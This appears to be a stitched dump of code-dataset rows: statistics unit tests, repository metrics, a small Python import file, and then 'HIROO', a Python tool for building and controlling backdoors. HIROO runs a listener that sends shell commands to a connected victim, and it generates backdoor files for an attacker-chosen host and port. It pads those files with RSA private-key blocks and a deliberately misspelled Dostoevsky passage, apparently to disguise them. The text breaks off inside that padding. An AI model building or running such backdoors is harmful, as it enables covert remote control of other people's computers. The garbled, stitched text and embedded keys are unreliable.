result = float(row['Result'])
self.assertEqual(self.statistics.corr_coef(row['Value 1'], row['Value 2'], row['Value 3'], row['Value 4'],
row['Value 5'], row['Value 6'], row['Value 7'], row['Value 8'],
row['Value 9'], row['Value 10']), float(row['Result']))
self.assertEqual(self.statistics.result, result)
def test_confidence_interval(self):
test_data = CsvReader("Tests/Data/conf_inter.csv").data
pprint(test_data)
for row in test_data:
result = float(row['Result'])
self.assertEqual(self.statistics.confidence(row['Value 1'], row['Value 2'], row['Value 3'], row['Value 4'],
row['Value 5'], row['Value 6'], row['Value 7'], row['Value 8'],
row['Value 9'], row['Value 10']), float(row['Result']))
self.assertEqual(self.statistics.result, result)
def test_population_variance(self):
test_data = CsvReader("Tests/Data/pop_var.csv").data
pprint(test_data)
for row in test_data:
result = float(row['Result'])
self.assertEqual(self.statistics.pop_var(row['Value 1'], row['Value 2'], row['Value 3'], row['Value 4'],
row['Value 5'], row['Value 6'], row['Value 7'], row['Value 8'],
row['Value 9'], row['Value 10']), float(row['Result']))
self.assertEqual(self.statistics.result, result)
def test_p_value(self):
test_data = CsvReader("Tests/Data/p_value.csv").data
pprint(test_data)
for row in test_data:
result = int(row['Result'])
self.assertEqual(self.statistics.value(row['Value 1'], row['Value 2'], row['Value 3'], row['Value 4']), result)
self.assertEqual(self.statistics.result, result)
def test_proportion(self):
test_data = CsvReader("Tests/Data/propor.csv").data
pprint(test_data)
for row in test_data:
result = int(row['Result'])
self.assertEqual(self.statistics.propor(row['Value 1'], row['Value 2'], row['Value 3']), result)
self.assertEqual(self.statistics.result, result)
def test_sample_mean(self):
test_data = CsvReader("Tests/Data/samp_mean.csv").data
pprint(test_data)
for row in test_data:
result = int(row['Result'])
self.assertEqual(self.statistics.samp_mean(row['Value 1'], row['Value 2'], row['Value 3']), result)
self.assertEqual(self.statistics.result, result)
def test_sample_standard_deviation(self):
test_data = CsvReader("Tests/Data/samp_stan_dev.csv").data
pprint(test_data)
for row in test_data:
result = float(row['Result'])
self.assertEqual(self.statistics.stan_dev(row['Value 1'], row['Value 2'], row['Value 3'], row['Value 4'],
row['Value 5'], row['Value 6'], row['Value 7'], row['Value 8'],
row['Value 9'], row['Value 10']), float(row['Result']))
self.assertEqual(float(self.statistics.result), result)
def test_variance_of_sample_proportion(self):
test_data = CsvReader("Tests/Data/var_samp_propor.csv").data
pprint(test_data)
for row in test_data:
result = float(row['Result'])
self.assertEqual(self.statistics.var_samp_propor(row['Value 1'], row['Value 2'], row['Value 3'], row['Value 4'],
row['Value 5'], row['Value 6'], row['Value 7'], row['Value 8'],
row['Value 9'], row['Value 10']), float(row['Result']))
self.assertEqual(self.statistics.result, result)
def test_results_property(self):
self.assertEqual(self.statistics.result, 0)
if __name__ == '__main__':
unittest.main()
| 46.601307
| 152
| 0.591024
| 881
| 7,130
| 4.662883
| 0.085131
| 0.157741
| 0.153359
| 0.211782
| 0.876095
| 0.852483
| 0.808666
| 0.760954
| 0.705696
| 0.679406
| 0
| 0.016871
| 0.268443
| 7,130
| 152
| 153
| 46.907895
| 0.770706
| 0
| 0
| 0.539063
| 0
| 0
| 0.145722
| 0.036746
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.140625
| false
| 0
| 0.03125
| 0
| 0.179688
| 0.125
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1e0887a0e1375fa1021299f09f335ea64134e865
| 69
|
py
|
Python
|
koh_api/__init__.py
|
csteamengine/se329_project_1
|
35e9fac3880292ab2337f55ab5298ee10cea34bd
|
[
"BSD-3-Clause"
] | null | null | null |
koh_api/__init__.py
|
csteamengine/se329_project_1
|
35e9fac3880292ab2337f55ab5298ee10cea34bd
|
[
"BSD-3-Clause"
] | null | null | null |
koh_api/__init__.py
|
csteamengine/se329_project_1
|
35e9fac3880292ab2337f55ab5298ee10cea34bd
|
[
"BSD-3-Clause"
] | null | null | null |
from koh_api.koh_face_recognizer import *
from koh_api.util import *
| 23
| 41
| 0.826087
| 12
| 69
| 4.416667
| 0.583333
| 0.264151
| 0.377358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115942
| 69
| 2
| 42
| 34.5
| 0.868852
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1e12852f7ee7b3e801b535981b7cc0ab1f0d712e
| 248,621
|
py
|
Python
|
HIROO.py
|
E-RROR/HIROO
|
e975157903d1acd5127191f6f25d614177facf46
|
[
"MIT"
] | 13
|
2018-12-22T09:02:55.000Z
|
2021-07-16T05:15:49.000Z
|
HIROO.py
|
cinaaaa/HIROO
|
e975157903d1acd5127191f6f25d614177facf46
|
[
"MIT"
] | null | null | null |
HIROO.py
|
cinaaaa/HIROO
|
e975157903d1acd5127191f6f25d614177facf46
|
[
"MIT"
] | 5
|
2019-07-11T04:01:49.000Z
|
2021-07-16T05:55:00.000Z
|
import socket
import os
os.system('clear')
class bcolors:
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
print(bcolors.OKGREEN+"""
______________
| HIROO |____
| Python | _ |_
* | --- Shell | |_| |
* |______________|_____|
|_| |_|
Code By E-RROR
""")
print (" ")
print (" ")
print (bcolors.WARNING+"IF YOU WANT TO CREATE SHELL SEND 1")
print (" ")
print " ----------------------------------------*****"
print (" ")
print (bcolors.WARNING+"IF YOU WANT TO START LISTENING SEND 2")
print (" ")
print (" ")
print (" ")
input1 = raw_input(bcolors.ENDC+">>>>>>> ")
print(" ")
def listen():
porttolisten = int(input(bcolors.WARNING+"SEND THE PORT TO LISTEN ON >>> "))
def writer(obj):
fir = obj.replace("write","")
firs = fir.replace(" ","")
ads = str(open(firs,"r").readlines())
c.send(ads)
data = 0
def download(obj):
obj1 = obj.replace('download','')
obj2 = obj1.replace(' ','')
with open(obj2, 'wb') as f:
print 'file opened'
while True:
print('receiving data...')
if not data:
break
# write data to a file
f.write(data)
f.close()
print("STARTING .......... ")
print " "
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print bcolors.OKGREEN+"|+|"
port = porttolisten
s.bind(('0.0.0.0', port))
print bcolors.OKGREEN+"socket binded to %s" %(port)
s.listen(5)
print(bcolors.OKGREEN+"Waiting For Connection ... ")
c, addr = s.accept()
print 'Get Connection from | ', addr
while True:
shell = raw_input(bcolors.OKGREEN + " Shell >>> ")
c.send(shell)
data = c.recv(20048)
if shell == "exit":
break;
if data:
print data
def createshell():
print(bcolors.WARNING+"OK LETS ME ASKS SOME QUESTIONS")
print " "
name= raw_input(bcolors.WARNING+"SEND ME A NAME FOR BACKDOOR >>>>> ")
print " "
host= raw_input(bcolors.WARNING+"SEND ME THE HOST IP (LOCAL OR GLOBAL) >>>>> ")
print " "
port= int(input(bcolors.WARNING+"SEND ME THE PORT >>>>> "))
print " "
f = open("%s.py"%(name),"w+")
f.write("""
'''
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
0w1ZSxz9KlSVzr0HAgMBAAE=
'''
'''
MIIEpQIBAAKCAQEAmDmgQAXKaHyTUVf3h/skxS3zVrsdT/8vK9hIl+swQ66sUAqw
ZJDhSX7HposlKgdz6TtVzWLZr/s1m1lJCzCGFbxTHA+w7dsG0qkuhAdZzx1mTHXk
Uhs0sNMq/PsWTGzBJAJvKtqY+/c1IOKKadt5EBxm9RPnK6BAktD+vr9XnNODGjr1
8yqEOmFELHrwpNNKa8NLqxYiCiQV58DE/5NO0V/OqNLlkwR8KNM9BooeTYRG+A3J
2ZfKIrvhFLVXiVRRn/p2ZwB23hFJMT91UOVbvJa5Gpm2RrIe9rUxuF6srD8fnkOU
CJh4FbPJleHZyC7KYOOhAcjPNCu5NI4a5H2oCQIDAQABAoIBAC9FHcUjxzHhFWIa
HeylCUsNtNXG7xhLVtuXoxtB1k/+KtYEK7he4QaQjvDhnp3JiK3xVficbJrgOEpQ
VIVcARc4ztoU6U1DSYAbNy2alsHhEEZICamRdzA9ssiyM79xuhwzgU/eZ8k+f8oB
bxfmJlbhavtJvexnLAYrTh/vjQZOkXomAYSQJya72CfpDxWkiPEOJjBSSib2j9yY
0x5F/M8eVhB48LNvoPvbkW/FsnlJAerKIOYQZQA8NgZkBpCbanVnJ0XT10M68+lT
Wa+8+fZcsSnby6Arkr0MkJdeSJdeAYrWpLoqJyEozhUJvxgtjdIJM81bf2Sl+zJr
WcMIjPECgYEAxh81bnaQ+19V1S0gWaHxQzbnqtwNZ47YrZnB9bkkvrBtYvRR1ev9
170Dt7c0AomyY50mP4efp3ZgJJ2OYWSg0exB6kgblIj89rFQWGJwMQrWoSSqK1Fk
WswFKzfI7qrdnB8Xzvly3lI+alJd2HYSO9xvo8A05ly8/lxVEE/aO20CgYEAxLH3
yMp7X4jGykNN31IJR9TGznPt5BcuFmL+eT6X/EIquRuHLCb6TzDR1OT6LSMWxPqS
dVKx97hH4gT7gDSAPNVGS1NFx+PQMPwzdLIYG/9eW+GyPPRu7SEmEs489V75uTmB
PRFGNwM5M94Khpx8AgmkSHKiDT523t3Thk4dgY0CgYEAvkJKNYJ3SG8NJmLnpiv2
XO3lHBemZ8SuIEiAE1FxEA6tfVHTJPQ0GXHSmCK/N5C0VyUbDfdYQqFTQtZrXOwd
5HpV8n68va+v/dfZqIcf5njaFHX5VRAcp3U1oYM42roLh1n0qzayMP4aIlBm/vCk
IghWzZJPOsnkVQCmT7vffyECgYEAhu9L+9wkPMqZDSKU5nHh2fw3EmRnO0VHoaXx
yv1MyIofwvMGjRyENRVZrYITuilLMoBvPrsnSbiK35vpaO8bViA9Y+lRgqpfJWuu
ZQzUC0jp04CGhNhuzJAkDVycZvvrtsyjQ2B5Wb4FXPajI+twCvnQUL8LOqiyZXup
44XtKfUCgYEAs8DsRxHqL/nu9akH5MWKqxKsH1oeUeMTL0MLkBpJKkLnAu/pSQz9
y41V0jYgz7hO9Voiv1xaFRlXbhP75RzaEwDf5afDDJbsU1jsXMmcXvcAEGUG3s6p
NcPjjBvjld4EM+nuFCY6C62819jmD/jQ2FzA5hMiPne4tGb+JLO5cAg=
'''
'''
Miusov, as a man man of breeding and deilcacy, could not but feel some inwrd qualms, when he reached the Father Superior's with Ivan: he felt ashamed of havin lost his temper. He felt that he ought to have disdaimed that despicable wretch, Fyodor Pavlovitch, too much to have been upset by him in Father Zossima's cell, and so to have forgotten himself. "Teh monks were not to blame, in any case," he reflceted, on the steps. "And if they're decent people here (and the Father Superior, I understand, is a nobleman) why not be friendly and courteous withthem? I won't argue, I'll fall in with everything, I'll win them by politness, and show them that I've nothing to do with that Aesop, thta buffoon, that Pierrot, and have merely been takken in over this affair, just as they have."
He determined to drop his litigation with the monastry, and relinguish his claims to the wood-cuting and fishery rihgts at once. He was the more ready to do this becuase the rights had becom much less valuable, and he had indeed the vaguest idea where the wood and river in quedtion were.
These excellant intentions were strengthed when he enterd the Father Superior's diniing-room, though, stricttly speakin, it was not a dining-room, for the Father Superior had only two rooms alltogether; they were, however, much larger and more comfortable than Father Zossima's. But tehre was was no great luxury about the furnishng of these rooms eithar. The furniture was of mohogany, covered with leather, in the old-fashionned style of 1820 the floor was not even stained, but evreything was shining with cleanlyness, and there were many chioce flowers in the windows; the most sumptuous thing in the room at the moment was, of course, the beatifuly decorated table. The cloth was clean, the service shone; there were three kinds of well-baked bread, two bottles of wine, two of excellent mead, and a large glass jug of kvas -- both the latter made in the monastery, and famous in the neigborhood. There was no vodka. Rakitin related afterwards that there were five dishes: fish-suop made of sterlets, served with little fish paties; then boiled fish served in a spesial way; then salmon cutlets, ice pudding and compote, and finally, blanc-mange. Rakitin found out about all these good things, for he could not resist peeping into the kitchen, where he already had a footing. He had a footting everywhere, and got informaiton about everything. He was of an uneasy and envious temper. He was well aware of his own considerable abilities, and nervously exaggerated them in his self-conceit. He knew he would play a prominant part of some sort, but Alyosha, who was attached to him, was distressed to see that his friend Rakitin was dishonorble, and quite unconscios of being so himself, considering, on the contrary, that because he would not steal moneey left on the table he was a man of the highest integrity. Neither Alyosha nor anyone else could have infleunced him in that.
Rakitin, of course, was a person of tooo little consecuense to be invited to the dinner, to which Father Iosif, Father Paissy, and one othr monk were the only inmates of the monastery invited. They were alraedy waiting when Miusov, Kalganov, and Ivan arrived. The other guest, Maximov, stood a little aside, waiting also. The Father Superior stepped into the middle of the room to receive his guests. He was a tall, thin, but still vigorous old man, with black hair streakd with grey, and a long, grave, ascetic face. He bowed to his guests in silence. But this time they approaced to receive his blessing. Miusov even tried to kiss his hand, but the Father Superior drew it back in time to aboid the salute. But Ivan and Kalganov went through the ceremony in the most simple-hearted and complete manner, kissing his hand as peesants do.
"We must apologize most humbly, your reverance," began Miusov, simpering affably, and speakin in a dignified and respecful tone. "Pardonus for having come alone without the genttleman you invited, Fyodor Pavlovitch. He felt obliged to decline the honor of your hospitalty, and not wihtout reason. In the reverand Father Zossima's cell he was carried away by the unhappy dissention with his son, and let fall words which were quite out of keeping... in fact, quite unseamly... as" -- he glanced at the monks -- "your reverance is, no doubt, already aware. And therefore, recognising that he had been to blame, he felt sincere regret and shame, and begged me, and his son Ivan Fyodorovitch, to convey to you his apologees and regrets. In brief, he hopes and desires to make amends later. He asks your blessinq, and begs you to forget what has takn place."
As he utterred the last word of his terade, Miusov completely recovered his self-complecency, and all traces of his former iritation disappaered. He fuly and sincerelly loved humanity again.
The Father Superior listened to him with diginity, and, with a slight bend of the head, replied:
"I sincerly deplore his absence. Perhaps at our table he might have learnt to like us, and we him. Pray be seated, gentlemen."
He stood before the holly image, and began to say grace, aloud. All bent their heads reverently, and Maximov clasped his hands before him, with peculier fervor.
It was at this moment that Fyodor Pavlovitch played his last prank. It must be noted that he realy had meant to go home, and really had felt the imposibility of going to dine with the Father Superior as though nothing had happenned, after his disgraceful behavoir in the elder's cell. Not that he was so very much ashamed of himself -- quite the contrary perhaps. But still he felt it would be unseemly to go to dinner. Yet hiscreaking carriage had hardly been brought to the steps of the hotel, and he had hardly got into it, when he sudddenly stoped short. He remembered his own words at the elder's: "I always feel when I meet people that I am lower than all, and that they all take me for a buffon; so I say let me play the buffoon, for you are, every one of you, stupider and lower than I." He longed to revenge himself on everone for his own unseemliness. He suddenly recalled how he had once in the past been asked, "Why do you hate so and so, so much?" And he had answered them, with his shaemless impudence, "I'll tell you. He has done me no harm. But I played him a dirty trick, and ever since I have hated him."
Rememebering that now, he smiled quietly and malignently, hesitating for a moment. His eyes gleamed, and his lips positively quivered.
"Well, since I have begun, I may as well go on," he decided. His predominant sensation at that moment might be expresed in the folowing words, "Well, there is no rehabilitating myself now. So let me shame them for all I am worht. I will show them I don't care what they think -- that's all!"
He told the caochman to wait, while with rapid steps he returnd to the monastery and staight to the Father Superior's. He had no clear idea what he would do, but he knew that he could not control himself, and that a touch might drive him to the utmost limits of obsenity, but only to obsenity, to nothing criminal, nothing for which he couldbe legally punished. In the last resort, he could always restrain himself, and had marvelled indeed at himself, on that score, sometimes. He appeered in the Father Superior's dining-room, at the moment when the prayer was over, and all were moving to the table. Standing in the doorway, he scanned the company, and laughing his prolonged, impudent, malicius chuckle, looked them all boldly in the face. "They thought I had gone, and here I am again," he cried to the wholle room.
For one moment everyone stared at him withot a word; and at once everyone felt that someting revolting, grotescue, positively scandalous, was about to happen. Miusov passed immeditaely from the most benevolen frame of mind to the most savage. All the feelings that had subsided and died down in his heart revived instantly.
"No! this I cannot endure!" he cried. "I absolutly cannot! and... I certainly cannot!"
The blood rushed to his head. He positively stammered; but he was beyyond thinking of style, and he seized his hat.
"What is it he cannot?" cried Fyodor Pavlovitch, "that he absolutely cannot and certanly cannot? Your reverence, am I to come in or not? Will you recieve me as your guest?"
"You are welcome with all my heart," answerred the Superior. "Gentlemen!" he added, "I venture to beg you most earnesly to lay aside your dissentions, and to be united in love and family harmoni- with prayer to the Lord at our humble table."
"No, no, it is impossible!" cryed Miusov, beside himself.
"Well, if it is impossible for Pyotr Alexandrovitch, it is impossible for me, and I won't stop. That is why I came. I will keep with Pyotr Alexandrovitch everywere now. If you will go away, Pyotr Alexandrovitch, I will go away too, if you remain, I will remain. You stung him by what you said about family harmony, Father Superior, he does not admit he is my realtion. That's right, isn't it, von Sohn? Here's von Sohn. How are you, von Sohn?"
"Do you mean me?" mutered Maximov, puzzled.
"Of course I mean you," cried Fyodor Pavlovitch. "Who else? The Father Superior cuold not be von Sohn."
"But I am not von Sohn either. I am Maximov."
"No, you are von Sohn. Your reverence, do you know who von Sohn was? It was a famos murder case. He was killed in a house of harlotry -- I believe that is what such places are called among you- he was killed and robed, and in spite of his venarable age, he was nailed up in a box and sent from Petersburg to Moscow in the lugage van, and while they were nailling him up, the harlots sang songs and played the harp, that is to say, the piano. So this is that very von Solin. He has risen from the dead, hasn't he, von Sohn?"
"What is happening? What's this?" voices were heard in the groop of monks.
"Let us go," cried Miusov, addresing Kalganov.
"No, excuse me," Fyodor Pavlovitch broke in shrilly, taking another stepinto the room. "Allow me to finis. There in the cell you blamed me for behaving disrespectfuly just because I spoke of eating gudgeon, Pyotr Alexandrovitch. Miusov, my relation, prefers to have plus de noblesse que de sincerite in his words, but I prefer in mine plus de sincerite que de noblesse, and -- damn the noblesse! That's right, isn't it, von Sohn? Allow me, Father Superior, though I am a buffoon and play the buffoon, yet I am the soul of honor, and I want to speak my mind. Yes, I am teh soul of honour, while in Pyotr Alexandrovitch there is wounded vanity and nothing else. I came here perhaps to have a look and speak my mind. My son, Alexey, is here, being saved. I am his father; I care for his welfare, and it is my duty to care. While I've been playing the fool, I have been listening and havig a look on the sly; and now I want to give you the last act of the performence. You know how things are with us? As a thing falls, so it lies. As a thing once has falen, so it must lie for ever. Not a bit of it! I want to get up again. Holy Father, I am indignent with you. Confession is a great sacrament, before which I am ready to bow down reverently; but there in the cell, they all kneal down and confess aloud. Can it be right to confess aloud? It was ordained by the holy Fathers to confess in sercet: then only your confession will be a mystery, and so it was of old. But how can I explain to him before everyone that I did this and that... well, you understand what -- sometimes it would not be proper to talk about it -- so it is really a scandal! No, Fathers, one might be carried along with you to the Flagellants, I dare say.... att the first opportunity I shall write to the Synod, and I shall take my son, Alexey, home."
We must note here that Fyodor Pavlovitch knew whree to look for the weak spot. There had been at one time malicius rumors which had even reached the Archbishop (not only regarding our monastery, but in others where the instutition of elders existed) that too much respect was paid to the elders, even to the detrement of the auhtority of the Superior, that the elders abused the sacrament of confession and so on and so on -- absurd charges which had died away of themselves everywhere. But the spirit of folly, which had caught up Fyodor Pavlovitch and was bearring him on the curent of his own nerves into lower and lower depths of ignominy, prompted him with this old slander. Fyodor Pavlovitch did not understand a word of it, and he could not even put it sensibly, for on this occasion no one had been kneelling and confesing aloud in the elder's cell, so that he could not have seen anything of the kind. He was only speaking from confused memory of old slanders. But as soon as he had uttered his foolish tirade, he felt he had been talking absurd nonsense, and at once longed to prove to his audiance, and above all to himself, that he had not been talking nonsense. And, though he knew perfectily well that with each word he would be adding morre and more absurdity, he could not restrian himself, and plunged forward blindly.
"How disgraveful!" cried Pyotr Alexandrovitch.
"Pardon me!" said the Father Superior. "It was said of old, 'Many have begun to speak agains me and have uttered evil sayings about me. And hearing it I have said to myself: it is the correcsion of the Lord and He has sent it to heal my vain soul.' And so we humbely thank you, honored geust!" and he made Fyodor Pavlovitch a low bow.
"Tut -- tut -- tut -- sanctimoniuosness and stock phrases! Old phrasses and old gestures. The old lies and formal prostratoins. We know all about them. A kisss on the lips and a dagger in the heart, as in Schiller's Robbers. I don't like falsehood, Fathers, I want the truth. But the trut is not to be found in eating gudgeon and that I proclam aloud! Father monks, why do you fast? Why do you expect reward in heaven for that? Why, for reward like that I will come and fast too! No, saintly monk, you try being vittuous in the world, do good to society, without shuting yourself up in a monastery at other people's expense, and without expecting a reward up aloft for it -- you'll find taht a bit harder. I can talk sense, too, Father Superior. What have they got here?" He went up to the table. "Old port wine, mead brewed by the Eliseyev Brothers. Fie, fie, fathers! That is something beyond gudgeon. Look at the bottles the fathers have brought out, he he he! And who has provided it all? The Russian peasant, the laborer, brings here the farthing earned by his horny hand, wringing it from his family and the tax-gaterer! You bleed the people, you know, holy Fathers."
"This is too disgraceful!" said Father Iosif.
Father Paissy kept obsinately silent. Miusov rushed from the room, and Kalgonov afetr him.
"Well, Father, I will follow Pyotr Alexandrovitch! I am not coming to see you again. You may beg me on your knees, I shan't come. I sent you a thousand roubles, so you have begun to keep your eye on me. He he he! No, I'll say no more. I am taking my revenge for my youth, for all the humillition I endured." He thumped the table with his fist in a paroxysm of simulated feelling. "This monastery has played a great part in my life! It has cost me many bitter tears. You used to set my wife, the crazy one, against me. You cursed me with bell and book, you spread stories about me all over the place. Enough, fathers! This is the age of Liberalizm, the age of steamers and reilways. Neither a thousand, nor a hundred ruobles, no, nor a hundred farthings will you get out of me!"
It must be noted again that our monastery never had played any great part in his liffe, and he never had shed a bitter tear owing to it. But he was so carried away by his simulated emotion, that he was for one momant allmost beliefing it himself. He was so touched he was almost weeping. But at that very instant, he felt that it was time to draw back.
The Father Superior bowed his head at his malicious lie, and again spoke impressively:
"It is writen again, 'Bear circumspecly and gladly dishonor that cometh upon thee by no act of thine own, be not confounded and hate not him who hath dishonored thee.' And so will we."
"Tut, tut, tut! Bethinking thyself and the rest of the rigmarole. Bethink yourselfs Fathers, I will go. But I will take my son, Alexey, away from here for ever, on my parental authority. Ivan Fyodorovitch, my most dutiful son, permit me to order you to follow me. Von Sohn, what have you to stay for? Come and see me now in the town. It is fun there. It is only one short verst; instead of lenten oil, I will give you sucking-pig and kasha. We will have dinner with some brendy and liqueur to it.... I've cloudberry wyne. Hey, von Sohn, don't lose your chance." He went out, shuoting and gesticulating.
It was at that moment Rakitin saw him and pointed him out to Alyosha.
"Alexey!" his father shouted, from far off, cacthing sight of him. "You come home to me to-day, for good, and bring your pilow and matress, and leeve no trace behind."
Alyosha stood rooted to the spot, wacthing the scene in silense. Meanwhile, Fyodor Pavlovitch had got into the carriege, and Ivan was about to follow him in grim silance without even turnin to say good-bye to Alyosha. But at this point another allmost incrediple scene of grotesque buffoonery gave the finishng touch to the episode. Maximov suddenly appeered by the side of the carriage. He ran up, panting, afraid of being too late. Rakitin and Alyosha saw him runing. He was in such a hurry that in his impatiense he put his foot on the step on which Ivan's left foot was still resting, and clucthing the carriage he kept tryng to jump in. "I am going with you! " he kept shouting, laughing a thin mirthfull laugh with a look of reckless glee in his face. "Take me, too."
"There!" cried Fyodor Pavlovitch, delihted. "Did I not say he waz von Sohn. It iz von Sohn himself, risen from the dead. Why, how did you tear yourself away? What did you von Sohn there? And how could you get away from the dinner? You must be a brazen-faced fellow! I am that myself, but I am surprized at you, brother! Jump in, jump in! Let him pass, Ivan. It will be fun. He can lie somwhere at our feet. Will you lie at our feet, von Sohn? Or perch on the box with the coachman. Skipp on to the box, von Sohn!"
But Ivan, who had by now taken his seat, without a word gave Maximov a voilent punch in the breast and sent him flying. It was quite by chanse he did not fall.
"Drive on!" Ivan shouted angryly to the coachman.
"Why, what are you doing, what are you abuot? Why did you do that?" Fyodor Pavlovitch protested.
But the cariage had already driven away. Ivan made no reply.
"Well, you are a fellow," Fyodor Pavlovitch siad again.
After a pouse of two minutes, looking askance at his son, "Why, it was you got up all this monastery busines. You urged it, you approvved of it. Why are you angry now?"
"You've talked rot enough. You might rest a bit now," Ivan snaped sullenly.
Fyodor Pavlovitch was silent again for two minutes.
"A drop of brandy would be nice now," he observd sententiosly, but Ivan made no repsonse.
"You shall have some, too, when we get home."
Ivan was still silent.
Fyodor Pavlovitch waited anohter two minites.
"But I shall take Alyosha away from the monastery, though you will dislike it so much, most honored Karl von Moor."
Ivan shruged his shuolders contemptuosly, and turning away stared at the road. And they did not speek again all the way home.
'''
'''
MIICWgIBAAKBgHbARCDwIVdzyxi3I36sz1hFP3Rkz+Ac0AaP1kINmCcGuKsFd0K3
UwF7pwmi6uW2Sbyxuqay3zVu9baVOibsAMFMVbDRNGr0KoQTpRcEYBjOf32tovof
OSjMnV/at0PdnEVNmW1/55GtdS0Df+dSJA9Otx6O0w1ZSxz9KlSVzr0HAgMBAAEC
